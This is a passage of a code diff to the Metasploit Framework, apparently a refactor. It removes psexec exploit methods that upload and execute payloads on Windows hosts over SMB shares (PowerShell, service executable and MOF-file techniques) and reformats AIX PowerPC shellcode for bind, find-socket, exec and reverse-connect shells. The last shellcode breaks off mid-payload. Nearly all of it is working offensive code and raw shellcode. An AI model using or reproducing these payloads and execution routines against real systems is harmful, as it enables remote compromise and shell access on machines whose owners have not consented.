username: datastore['SMBUser'].downcase
|
||||
}
|
||||
|
||||
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
|
||||
credential_data.merge!({
|
||||
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
|
||||
realm_value: datastore['SMBDomain']
|
||||
})
|
||||
end
|
||||
|
||||
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
|
||||
credential_data.merge!({:private_type => :ntlm_hash})
|
||||
else
|
||||
credential_data.merge!({:private_type => :password})
|
||||
end
|
||||
|
||||
credential_data.merge!(service_data)
|
||||
|
||||
credential_core = create_credential(credential_data)
|
||||
|
||||
login_data = {
|
||||
access_level: 'Admin',
|
||||
core: credential_core,
|
||||
last_attempted_at: DateTime.now,
|
||||
status: Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
}
|
||||
|
||||
login_data.merge!(service_data)
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -112,177 +112,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
case target.name
|
||||
when 'Automatic'
|
||||
if powershell_installed?
|
||||
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
|
||||
print_status('Selecting PowerShell target')
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
else
|
||||
print_status('Selecting native target')
|
||||
native_upload
|
||||
native_upload(datastore['SHARE'])
|
||||
end
|
||||
when 'PowerShell'
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
when 'Native upload'
|
||||
native_upload
|
||||
native_upload(datastore['SHARE'])
|
||||
when 'MOF upload'
|
||||
mof_upload
|
||||
mof_upload(datastore['SHARE'])
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def powershell_installed?
|
||||
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
|
||||
|
||||
case datastore['SHARE'].upcase
|
||||
when 'ADMIN$'
|
||||
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
when 'C$'
|
||||
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
else
|
||||
path = datastore['PSH_PATH']
|
||||
end
|
||||
|
||||
simple.connect(share)
|
||||
|
||||
vprint_status("Checking for #{path}")
|
||||
|
||||
if smb_file_exist?(path)
|
||||
vprint_status('PowerShell found')
|
||||
psh = true
|
||||
else
|
||||
vprint_status('PowerShell not found')
|
||||
psh = false
|
||||
end
|
||||
|
||||
simple.disconnect(share)
|
||||
|
||||
psh
|
||||
end
|
||||
|
||||
def powershell
|
||||
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
|
||||
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
||||
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
||||
end
|
||||
|
||||
# Execute the powershell command
|
||||
print_status("Executing the payload...")
|
||||
begin
|
||||
psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
end
|
||||
end
|
||||
|
||||
def native_upload
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
smbshare = datastore['SHARE']
|
||||
fileprefix = ""
|
||||
# if SHARE = Users/sasha/ or something like this
|
||||
if smbshare =~ /.[\\\/]/
|
||||
subfolder = true
|
||||
smbshare = datastore['SHARE'].dup
|
||||
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
||||
folder_list = smbshare.split(/[\\\/]/)
|
||||
smbshare = folder_list[0]
|
||||
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
|
||||
else
|
||||
subfolder = false
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{filename}", 'rwct')
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#{filename}...")
|
||||
else
|
||||
print_status("Created \\#{filename}...")
|
||||
end
|
||||
|
||||
# Disconnect from the share
|
||||
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
|
||||
# define the file location
|
||||
if datastore['SHARE'] == 'ADMIN$'
|
||||
file_location = "%SYSTEMROOT%\\#{filename}"
|
||||
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
|
||||
file_location = datastore['SHARE'].slice(0,1) + ":\\#{filename}"
|
||||
else
|
||||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
|
||||
end
|
||||
|
||||
psexec(file_location, false)
|
||||
|
||||
unless datastore['SERVICE_PERSIST']
|
||||
print_status("Deleting \\#{filename}...")
|
||||
#This is not really useful but will prevent double \\ on the wire :)
|
||||
if datastore['SHARE'] =~ /.[\\\/]/
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{fileprefix}\\#{filename}")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
|
||||
end
|
||||
else
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{filename}")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{filename} failed: #{e.message}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def mof_upload
|
||||
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if datastore['SHARE'] != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect(share)
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect(share)
|
||||
end
|
||||
|
||||
def report_auth
|
||||
service_data = {
|
||||
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
|
||||
|
|
|
@ -40,70 +40,70 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" +# bnel <bndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x20" +# bctr #
|
||||
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" +# svca 0 #
|
||||
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
|
||||
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" + # bnel <bndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x20" + # bctr #
|
||||
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" + # svca 0 #
|
||||
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" + # lil r29,2047 #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
|
||||
@cal_socket +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
|
||||
"\x3f\x60\xff\x02" +# liu r27,-254 #
|
||||
"\x63\x7b\x11\x5c" +# oril r27,r27,4444 #
|
||||
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
|
||||
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
|
||||
"\x3f\x60\xff\x02" + # liu r27,-254 #
|
||||
"\x63\x7b\x11\x5c" + # oril r27,r27,4444 #
|
||||
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
|
||||
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_bind +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" + # mr r3,r28 #
|
||||
@cal_listen +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" + # mr r3,r28 #
|
||||
@cal_accept +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" +# mr r3,r25 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" + # mr r3,r25 #
|
||||
@cal_close +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\x25\xcb\x78" +# mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x43\xd3\x78" +# mr r3,r26 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7f\x25\xcb\x78" + # mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x43\xd3\x78" + # mr r3,r26 #
|
||||
@cal_kfcntl +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" +# bge <bndsockcode+160> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <bndsockcode+208> #
|
||||
"\x7f\x08\x02\xa6" +# mflr r24 #
|
||||
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" + # bge <bndsockcode+160> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <bndsockcode+208> #
|
||||
"\x7f\x08\x02\xa6" + # mflr r24 #
|
||||
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_execve +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"/bin/csh"
|
||||
|
||||
# If the payload is generated and there are offsets to substitute,
|
||||
|
|
|
@ -40,59 +40,59 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" +# bnel <fndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x20" +# bctr #
|
||||
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" +# svca 0 #
|
||||
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
||||
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
|
||||
"\x3b\x7d\xf8\x2d" +# cal r27,-2003(r29) #
|
||||
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
|
||||
"\x7c\x3b\x0b\x78" +# mr r27,r1 #
|
||||
"\x3b\xff\x01\xff" +# cal r31,511(r31) #
|
||||
"\x3b\xff\xfe\x02" +# cal r31,-510(r31) #
|
||||
"\x7f\x65\xdb\x78" +# mr r5,r27 #
|
||||
"\x7f\x84\xe3\x78" +# mr r4,r28 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" + # bnel <fndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x20" + # bctr #
|
||||
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" + # svca 0 #
|
||||
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" + # lil r29,2047 #
|
||||
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
|
||||
"\x3b\x7d\xf8\x2d" + # cal r27,-2003(r29) #
|
||||
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
|
||||
"\x7c\x3b\x0b\x78" + # mr r27,r1 #
|
||||
"\x3b\xff\x01\xff" + # cal r31,511(r31) #
|
||||
"\x3b\xff\xfe\x02" + # cal r31,-510(r31) #
|
||||
"\x7f\x65\xdb\x78" + # mr r5,r27 #
|
||||
"\x7f\x84\xe3\x78" + # mr r4,r28 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
@cal_getpeername +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x3b\x5c\x01\xff" +# cal r26,511(r28) #
|
||||
"\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) #
|
||||
"\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 #
|
||||
"\x40\x82\xff\xd4" +# bne <fndsockcode+64> #
|
||||
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" +# mr r3,r25 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x3b\x5c\x01\xff" + # cal r26,511(r28) #
|
||||
"\xa3\x5a\xfe\x03" + # lhz r26,-509(r26) #
|
||||
"\x28\x1a\x11\x5c" + # cmpli 0,r26,4444 #
|
||||
"\x40\x82\xff\xd4" + # bne <fndsockcode+64> #
|
||||
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" + # mr r3,r25 #
|
||||
@cal_close +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\x25\xcb\x78" +# mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7f\x25\xcb\x78" + # mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
@cal_kfcntl +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" +# bge <fndsockcode+116> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <fndsockcode+164> #
|
||||
"\x7f\x08\x02\xa6" +# mflr r24 #
|
||||
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" + # bge <fndsockcode+116> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <fndsockcode+164> #
|
||||
"\x7f\x08\x02\xa6" + # mflr r24 #
|
||||
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_execve +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"/bin/csh"
|
||||
|
||||
# If the payload is generated and there are offsets to substitute,
|
||||
|
|
|
@ -34,18 +34,18 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */
|
||||
"\x40\x82\xff\xfd" +# /* bnel <shellcode> */
|
||||
"\x7f\xe8\x02\xa6" +# /* mflr r31 */
|
||||
"\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */
|
||||
"\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */
|
||||
"\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */
|
||||
"\x90\x7f\xff\x10" +# /* st r3,-240(r31) */
|
||||
"\x90\xbf\xff\x14" +# /* st r5,-236(r31) */
|
||||
"\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */
|
||||
"\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */
|
||||
"\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */
|
||||
"\x44\xff\xff\x02" +# /* svca */
|
||||
"\x7c\xa5\x2a\x79" + # /* xor. r5,r5,r5 */
|
||||
"\x40\x82\xff\xfd" + # /* bnel <shellcode> */
|
||||
"\x7f\xe8\x02\xa6" + # /* mflr r31 */
|
||||
"\x3b\xff\x01\x20" + # /* cal r31,0x120(r31) */
|
||||
"\x38\x7f\xff\x08" + # /* cal r3,-248(r31) */
|
||||
"\x38\x9f\xff\x10" + # /* cal r4,-240(r31) */
|
||||
"\x90\x7f\xff\x10" + # /* st r3,-240(r31) */
|
||||
"\x90\xbf\xff\x14" + # /* st r5,-236(r31) */
|
||||
"\x88\x5f\xff\x0f" + # /* lbz r2,-241(r31) */
|
||||
"\x98\xbf\xff\x0f" + # /* stb r5,-241(r31) */
|
||||
"\x4c\xc6\x33\x42" + # /* crorc cr6,cr6,cr6 */
|
||||
"\x44\xff\xff\x02" + # /* svca */
|
||||
"/bin/sh"+
|
||||
"\x05"
|
||||
|
||||
|
|
|
@ -41,55 +41,55 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x20" +# bctr #
|
||||
"\xff\x02\x11\x5c" +# .long 0xff02115c #
|
||||
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
|
||||
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" +# svca 0 #
|
||||
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
||||
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <cntsockcode> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x25" + # cal r30,-475(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x20" + # bctr #
|
||||
"\xff\x02\x11\x5c" + # .long 0xff02115c #
|
||||
"\x7f\x00\x00\x01" + # .long 0x7f000001 #
|
||||
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" + # svca 0 #
|
||||
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" + # lil r29,2047 #
|
||||
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
|
||||
@cal_socket +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
|
||||
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
|
||||
"\x38\x9e\xff\xf8" + # cal r4,-8(r30) #
|
||||
@cal_connect +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x3b\x7d\xf8\x03" +# cal r27,-2045(r29) #
|
||||
"\x7f\x63\xdb\x78" +# mr r3,r27 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x3b\x7d\xf8\x03" + # cal r27,-2045(r29) #
|
||||
"\x7f\x63\xdb\x78" + # mr r3,r27 #
|
||||
@cal_close +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\x65\xdb\x78" +# mr r5,r27 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7f\x65\xdb\x78" + # mr r5,r27 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" + # mr r3,r28 #
|
||||
@cal_kfcntl +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
|
||||
"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #
|
||||
"\x7f\x08\x02\xa6" +# mflr r24 #
|
||||
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x37\x7b\xff\xff" + # ai. r27,r27,-1 #
|
||||
"\x40\x80\xff\xd4" + # bge <cntsockcode+100> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <cntsockcode+148> #
|
||||
